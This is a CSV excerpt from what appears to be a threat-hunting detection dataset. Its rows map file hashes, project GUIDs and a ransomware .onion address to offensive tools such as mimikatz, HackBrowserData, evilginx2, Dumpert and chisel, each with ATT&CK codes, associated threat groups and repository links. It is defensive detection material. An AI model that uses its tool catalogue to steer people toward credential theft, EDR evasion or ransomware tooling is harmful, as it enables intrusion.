"*1c50edff472ca0901cc9f483e21487dc2c8734e91a10f9426fac07bfea048277*",".{0,1000}1c50edff472ca0901cc9f483e21487dc2c8734e91a10f9426fac07bfea048277.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","22743"
"*1c543ea5c50ef8b0b42f835970fa5f553c2ae5c308d2692b51fb476173653cb3*",".{0,1000}1c543ea5c50ef8b0b42f835970fa5f553c2ae5c308d2692b51fb476173653cb3.{0,1000}","offensive_tool_keyword","OpenChromeDumps","OpenChrome Dump used with GrabChrome for credential access","T1003 - T1555 - T1081 - T1552","TA0006","N/A","Yanluowang - Dispossessor","Credential Access","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","22744"
"*1c55052f6f033698ff4e88528e91070676dd2b74f259f6304a05599e902d7d63*",".{0,1000}1c55052f6f033698ff4e88528e91070676dd2b74f259f6304a05599e902d7d63.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","#filehash","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","22745"
"*1c5610c15476512d11f83809cd70dd22ffe4a9042aa11ab251d8ecf8f3772bcb*",".{0,1000}1c5610c15476512d11f83809cd70dd22ffe4a9042aa11ab251d8ecf8f3772bcb.{0,1000}","offensive_tool_keyword","Sublist3r","Sublist3r is a python tool designed to enumerate subdomains of websites using OSINT. It helps penetration testers and bug hunters collect and gather subdomains for the domain they are targeting. Sublist3r enumerates subdomains using many search engines such as Google. Yahoo. Bing. Baidu and Ask. Sublist3r also enumerates subdomains using Netcraft. Virustotal. ThreatCrowd. DNSdumpster and ReverseDNS. subbrute was integrated with Sublist3r to increase the possibility of finding more subdomains using bruteforce with an improved wordlist. The credit goes to TheRook who is the author of subbrute.","T1210.001 - T1190 - T1574.001","TA0007 - TA0002 - TA0010","N/A","ENERGETIC BEAR","Reconnaissance","https://github.com/aboul3la/Sublist3r","1","0","#filehash","N/A","5","10","10300","2148","2024-08-02T00:00:30Z","2015-12-15T00:55:25Z","22746"
"*1C5EDA8C-D27F-44A4-A156-6F863477194D*",".{0,1000}1C5EDA8C\-D27F\-44A4\-A156\-6F863477194D.{0,1000}","offensive_tool_keyword","ntdlll-unhooking-collection","unhooking ntdll from disk - from KnownDlls - from suspended process - from remote server (fileless)","T1055 - T1055.001 - T1070 - T1070.004 - T1101 - T1574 - T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/ntdlll-unhooking-collection","1","0","#GUIDproject","N/A","9","2","188","38","2023-08-02T02:26:33Z","2023-02-07T16:54:15Z","22747"
"*1c6b60ff20f7c26a7436d966fc741ecd05dc2b3326de1ebcd7fcf6142ac24409*",".{0,1000}1c6b60ff20f7c26a7436d966fc741ecd05dc2b3326de1ebcd7fcf6142ac24409.{0,1000}","offensive_tool_keyword","RemotePotato0","Windows Privilege Escalation from User to Domain Admin.","T1078.002 - T1078.003 - T1078.004","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RemotePotato0","1","0","#filehash","N/A","10","10","1382","215","2022-12-18T01:52:53Z","2021-02-08T22:02:19Z","22749"
"*1c769a377183290cfd533a08f14b9a7b20e618f164720a7857faddad5976bbae*",".{0,1000}1c769a377183290cfd533a08f14b9a7b20e618f164720a7857faddad5976bbae.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","22751"
"*1c7a0b2c6c4f86ed3665aef0e0482cc6c5f9a9daec792714a4da73d94cd93ffa*",".{0,1000}1c7a0b2c6c4f86ed3665aef0e0482cc6c5f9a9daec792714a4da73d94cd93ffa.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","22753"
"*1c7e49aa70c93b8d84d80679b4b869c58c84e7bacef8dee13aff9837423d8f4d*",".{0,1000}1c7e49aa70c93b8d84d80679b4b869c58c84e7bacef8dee13aff9837423d8f4d.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","22755"
"*1c7e93ed2b3eed1303cc11d09b4fea4b183fb0e7041f9584c81ca4c989d8a46f*",".{0,1000}1c7e93ed2b3eed1303cc11d09b4fea4b183fb0e7041f9584c81ca4c989d8a46f.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","22756"
"*1c8101652c99416535282e92882538ba9daee459abeb16c1fa1e3f6578a20367*",".{0,1000}1c8101652c99416535282e92882538ba9daee459abeb16c1fa1e3f6578a20367.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","22757"
"*1c8101652c99416535282e92882538ba9daee459abeb16c1fa1e3f6578a20367*",".{0,1000}1c8101652c99416535282e92882538ba9daee459abeb16c1fa1e3f6578a20367.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","22758"
"*1c841d5d1d34538febdda50a60f9e4f7a9df773a40dccacbd6aaa75595babfdb*",".{0,1000}1c841d5d1d34538febdda50a60f9e4f7a9df773a40dccacbd6aaa75595babfdb.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","22759"
"*1c881e15825d07769929a42b91b42b3093d26ab24f033d43646d238a7d23de49*",".{0,1000}1c881e15825d07769929a42b91b42b3093d26ab24f033d43646d238a7d23de49.{0,1000}","offensive_tool_keyword","Rust-Malware-Samples","open source ransomware Encryfer in rust","T1486 - T1489 - T1485","TA0040 - TA0043 - TA0042","N/A","N/A","Ransomware","https://github.com/Whitecat18/Rust-for-Malware-Development/tree/main/Malware-Samples","1","0","#filehash","N/A","10","10","2123","53","2025-04-22T18:09:57Z","2024-02-12T16:55:06Z","22761"
"*1c8de7031ee8dbf83ffde0f1d6401dbc9d95059c984290b115bd58c20b86e8a6*",".{0,1000}1c8de7031ee8dbf83ffde0f1d6401dbc9d95059c984290b115bd58c20b86e8a6.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","22763"
"*1c9a4023737f0be81e06da3719ab68310dca400ca15cfb63012949215fb694eb*",".{0,1000}1c9a4023737f0be81e06da3719ab68310dca400ca15cfb63012949215fb694eb.{0,1000}","offensive_tool_keyword","Koppeling","Adaptive DLL hijacking / dynamic export forwarding","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/monoxgas/Koppeling","1","0","#filehash","N/A","8","8","748","128","2020-07-06T14:47:57Z","2020-02-18T21:08:16Z","22765"
"*1ca83ff934429dfd4ea340013ffc974399cba5d6bf46aa315dd2fd17846ff731*",".{0,1000}1ca83ff934429dfd4ea340013ffc974399cba5d6bf46aa315dd2fd17846ff731.{0,1000}","offensive_tool_keyword","POC","CVE-2021-21972 POC exploitation","T1190 - T1059.001 - T1040","TA0001 - TA0003 - TA0009","N/A","Dispossessor","Exploitation tool","https://github.com/NS-Sp4ce/CVE-2021-21972","1","0","#filehash","N/A","7","5","491","146","2023-06-08T04:01:33Z","2021-02-24T11:14:58Z","22767"
"*1cad3b4c47e6f3d4f97c3299b8d1498bd2a4cd3c7eb26f255f693bbcd46fe516*",".{0,1000}1cad3b4c47e6f3d4f97c3299b8d1498bd2a4cd3c7eb26f255f693bbcd46fe516.{0,1000}","offensive_tool_keyword","PrivFu","get SYSTEM integrity level by abusing arbitrary kernel write vulnerability and token privileges","T1068 - T1134 - T1134.001 - T1078 - T1059","TA0004 - TA0009 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","#filehash","KernelWritePoCs","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","22768"
"*1cb076b6d5b6cb781a5af9b1211d2309840a6b47c4998b802fb8667771548e17*",".{0,1000}1cb076b6d5b6cb781a5af9b1211d2309840a6b47c4998b802fb8667771548e17.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","22770"
"*1CB9BB2AEE8B6A248427185F165AD3FDDAE8EA923D338C40E93E6F47F1C3F351*",".{0,1000}1CB9BB2AEE8B6A248427185F165AD3FDDAE8EA923D338C40E93E6F47F1C3F351.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","22771"
"*1cbb36d4cf2b775b3009d1d33ce8a90c8a321cc30b884250639142cea085ac06*",".{0,1000}1cbb36d4cf2b775b3009d1d33ce8a90c8a321cc30b884250639142cea085ac06.{0,1000}","offensive_tool_keyword","EDRPrison","Leverage a legitimate WFP callout driver to prevent EDR agents from sending telemetry","T1562 - T1027","TA0005 - TA0007","N/A","N/A","Defense Evasion","https://github.com/senzee1984/EDRPrison","1","0","#filehash","N/A","10","5","401","37","2024-08-02T18:10:02Z","2024-06-30T01:17:04Z","22772"
"*1cbc16fda9baa7412d012fb0de8958299e885fdb47bddae7d5c05431f2efcc32*",".{0,1000}1cbc16fda9baa7412d012fb0de8958299e885fdb47bddae7d5c05431f2efcc32.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","22773"
"*1cbd063601dcb5c5eaab527a17f922ce8b73ddcf7b8efd03da1612737ce0d672*",".{0,1000}1cbd063601dcb5c5eaab527a17f922ce8b73ddcf7b8efd03da1612737ce0d672.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","22774"
"*1cc45acf429d705ee592af1c9e56ac25f5b5acbc27fe555db5007c8be9cc4c42*",".{0,1000}1cc45acf429d705ee592af1c9e56ac25f5b5acbc27fe555db5007c8be9cc4c42.{0,1000}","offensive_tool_keyword","BrowsingHistoryView","BrowsingHistoryView is a utility that reads the history data of different Web browsers","T1217 - T1070 - T1113","TA0009 - TA0005 - TA0007","N/A","GOBLIN PANDA","Discovery","https://www.nirsoft.net/utils/browsing_history_view.html","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","22778"
"*1cc4fab54263dfa842c80a72b78a9c223894264b9b4f25263d8fdc2f69def8a1*",".{0,1000}1cc4fab54263dfa842c80a72b78a9c223894264b9b4f25263d8fdc2f69def8a1.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","22779"
"*1cc9f944c28a83b4c7fc6081800e4385fe5abc7ccd55074038197a966a03cdbb*",".{0,1000}1cc9f944c28a83b4c7fc6081800e4385fe5abc7ccd55074038197a966a03cdbb.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","22782"
"*1cccdb0227ae73ae4c712460d12cf2fb9316568f2f8ceae6e6e3e101a8552942*",".{0,1000}1cccdb0227ae73ae4c712460d12cf2fb9316568f2f8ceae6e6e3e101a8552942.{0,1000}","offensive_tool_keyword","CACTUSTORCH","A JavaScript and VBScript shellcode launcher. This will spawn a 32 bit version of the binary specified and inject shellcode into it.","T1055.011 - T1059.005 - T1059.007","TA0002 - TA0005","N/A","APT32","Exploitation tool","https://github.com/mdsecactivebreach/CACTUSTORCH","1","0","#filehash","N/A","8","10","1006","227","2018-07-03T06:47:36Z","2017-07-04T10:20:34Z","22783"
"*1cd05248c2diffczd.zgpnnj5ikwfugnfvmxzn3qaafstcrdwue4eevw2lzx57rx5bfkia6ryd.onion*",".{0,1000}1cd05248c2diffczd\.zgpnnj5ikwfugnfvmxzn3qaafstcrdwue4eevw2lzx57rx5bfkia6ryd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","22785"
"*1cdbbd933f2f3b766efcabbe97d13cd5275165a3d67b9dfb0aa6d34fd7a89bfd*",".{0,1000}1cdbbd933f2f3b766efcabbe97d13cd5275165a3d67b9dfb0aa6d34fd7a89bfd.{0,1000}","offensive_tool_keyword","Dispossessor","Bruteforce tools used by Dispossessor ransomware group","T1003 - T1555 - T1081 - T1552","TA0006","N/A","Dispossessor","Credential Access","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","22788"
"*1cdd9db6aa54fd65d12bfaa84e98f8297a2780dadf42c42d6f275ec1ff43d36f*",".{0,1000}1cdd9db6aa54fd65d12bfaa84e98f8297a2780dadf42c42d6f275ec1ff43d36f.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","22789"
"*1cdf39ef6ad31ac88c9e87a1ff987d56fc6101b1bea30b08239ccc6d8560b311*",".{0,1000}1cdf39ef6ad31ac88c9e87a1ff987d56fc6101b1bea30b08239ccc6d8560b311.{0,1000}","offensive_tool_keyword","sgn","polymorphic encoder used in  to obfuscate payloads","T1027","TA0005","N/A","N/A","Defense Evasion","https://github.com/EgeBalci/sgn","1","0","#filehash","N/A","8","10","1681","224","2024-02-22T17:35:59Z","2019-10-30T10:20:01Z","22790"
"*1ce610dbd4ac4eaf18555046ad6001ecac4245c8d69eb4f3cc9affa10d37bacb*",".{0,1000}1ce610dbd4ac4eaf18555046ad6001ecac4245c8d69eb4f3cc9affa10d37bacb.{0,1000}","offensive_tool_keyword","Dumpert","Dumpert. an LSASS memory dumper using direct system calls and API unhooking Recent malware research shows that there is an increase in malware that is using direct system calls to evade user-mode API hooks used by security products. This tool demonstrates the use of direct System Calls and API unhooking and combine these techniques in a proof of concept code which can be used to create a LSASS memory dump using Cobalt Strike. while not touching disk and evading AV/EDR monitored user-mode API calls.","T1055.011 - T1003 - T1562.001 - T1027","TA0005 - TA0006","N/A","Dispossessor","Credential Access","https://github.com/outflanknl/Dumpert","1","0","#filehash","Dispossessor samples","10","10","1523","246","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z","22791"
"*1cf2330bd7746cf855dac61e732dd8105a5a62e97d918e88e8f9c3514ff2d783*",".{0,1000}1cf2330bd7746cf855dac61e732dd8105a5a62e97d918e88e8f9c3514ff2d783.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","22792"
"*1d015455d5d224c4a3a39c9f43d7c057bd5aebad39b04e831d2fa517d94add09*",".{0,1000}1d015455d5d224c4a3a39c9f43d7c057bd5aebad39b04e831d2fa517d94add09.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","22793"
"*1d0e8e47b8cada01b881d1685096940d044c0729cfe0071b4c7571c55737d0dc*",".{0,1000}1d0e8e47b8cada01b881d1685096940d044c0729cfe0071b4c7571c55737d0dc.{0,1000}","offensive_tool_keyword","SharpShares","Multithreaded C# .NET Assembly to enumerate accessible network shares in a domain","T1046 - T1135","TA0007 - TA0001","N/A","BlackSuit - Royal - BianLian - Fog","Discovery","https://github.com/mitchmoser/SharpShares","1","0","#filehash","N/A","10","4","351","49","2021-09-21T08:14:27Z","2020-09-25T22:35:57Z","22795"
"*1d10b68b19d7daf2ec05a7b9d2683b7e4afa81b442781c1884f67517d323c999*",".{0,1000}1d10b68b19d7daf2ec05a7b9d2683b7e4afa81b442781c1884f67517d323c999.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","22796"
"*1D1B59D9-10AF-40FE-BE99-578C09DB7A2A*",".{0,1000}1D1B59D9\-10AF\-40FE\-BE99\-578C09DB7A2A.{0,1000}","offensive_tool_keyword","ShareAudit","A tool for auditing network shares in an Active Directory environment","T1135 - T1005 - T1083 - T1210","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/dionach/ShareAudit","1","0","#GUIDproject","N/A","8","1","42","15","2019-04-29T10:07:57Z","2019-02-26T16:00:15Z","22797"
"*1d1d8b1b9afd3d323cd82131faccddc5565475751c9e8e2b5d6bad2f5f387b42*",".{0,1000}1d1d8b1b9afd3d323cd82131faccddc5565475751c9e8e2b5d6bad2f5f387b42.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","22798"
"*1d259e77687bc50118ed0a0f6e2e1a1d62b21f39c3f9549b729a01e023773252*",".{0,1000}1d259e77687bc50118ed0a0f6e2e1a1d62b21f39c3f9549b729a01e023773252.{0,1000}","offensive_tool_keyword","Forensia","Anti Forensics Tool For Red Teamers - Used For Erasing Some Footprints In The Post Exploitation Phase","T1070.001 - T1070.002 - T1070.004 - T1070.006 - T1070.009 - T1564.004 - T1553.002 - T1027","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/PaulNorman01/Forensia","1","0","#filehash","N/A","10","8","755","75","2023-06-23T23:23:22Z","2022-12-07T14:45:52Z","22800"
"*1d267caeb15c945b29b8a7c377582036ac1f72e2a977042947f149f099b5ffcb*",".{0,1000}1d267caeb15c945b29b8a7c377582036ac1f72e2a977042947f149f099b5ffcb.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","22801"
"*1d294d6fcae8b9d57d60166f102fd91d63ad88def2ab80eadcac22750f6f3c47*",".{0,1000}1d294d6fcae8b9d57d60166f102fd91d63ad88def2ab80eadcac22750f6f3c47.{0,1000}","offensive_tool_keyword","NativeBypassCredGuard","Bypass Credential Guard by patching WDigest.dll using only NTAPI functions","T1558 - T1003.006","TA0006 - TA0005","N/A","N/A","Defense Evasion","https://github.com/ricardojoserf/NativeBypassCredGuard","1","0","#filehash","N/A","7","3","236","28","2025-04-08T18:58:37Z","2024-12-01T16:58:03Z","22803"
"*1d2c6cbd5fc288ffb92db49344a394eba6d3418df04bd6178007a33b8d82178e*",".{0,1000}1d2c6cbd5fc288ffb92db49344a394eba6d3418df04bd6178007a33b8d82178e.{0,1000}","offensive_tool_keyword","reverst","Reverse Tunnels in Go over HTTP/3 and QUIC","T1572 - T1071.001 - T1105","TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/flipt-io/reverst","1","0","#filehash","N/A","10","10","953","39","2025-04-16T22:33:32Z","2024-04-03T13:32:11Z","22804"
"*1d2c6cbd5fc288ffb92db49344a394eba6d3418df04bd6178007a33b8d82178e*",".{0,1000}1d2c6cbd5fc288ffb92db49344a394eba6d3418df04bd6178007a33b8d82178e.{0,1000}","offensive_tool_keyword","reverst","Reverse Tunnels in Go over HTTP/3 and QUIC","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","N/A","C2","https://github.com/flipt-io/reverst","1","0","#filehash","N/A","10","10","953","39","2025-04-16T22:33:32Z","2024-04-03T13:32:11Z","22805"
"*1d2e4fa684a99e31479bcc0e5e14aa7f3c56cce3de71028241a9745c67ebf034*",".{0,1000}1d2e4fa684a99e31479bcc0e5e14aa7f3c56cce3de71028241a9745c67ebf034.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","22806"
"*1d3480472e9ab2c37d65f2278d4ca4a2fe32ac65953c828fbedddb371ae44cc7*",".{0,1000}1d3480472e9ab2c37d65f2278d4ca4a2fe32ac65953c828fbedddb371ae44cc7.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","22808"
"*1d389e53c658a3919dfcd0d1e3dd08c34a2e875eb1520ec0b9648e43e25eaabc*",".{0,1000}1d389e53c658a3919dfcd0d1e3dd08c34a2e875eb1520ec0b9648e43e25eaabc.{0,1000}","offensive_tool_keyword","Browser Data Grabber","credential access tool used by the Dispossessor ransomware group","T1003 - T1555 - T1081 - T1552","TA0006","N/A","Dispossessor","Credential Access","https://github.com/n37sn4k3/BrowserDataGrabber","1","0","#filehash","N/A","10","1","7","4","2018-05-28T15:49:03Z","2018-05-04T12:33:32Z","22809"
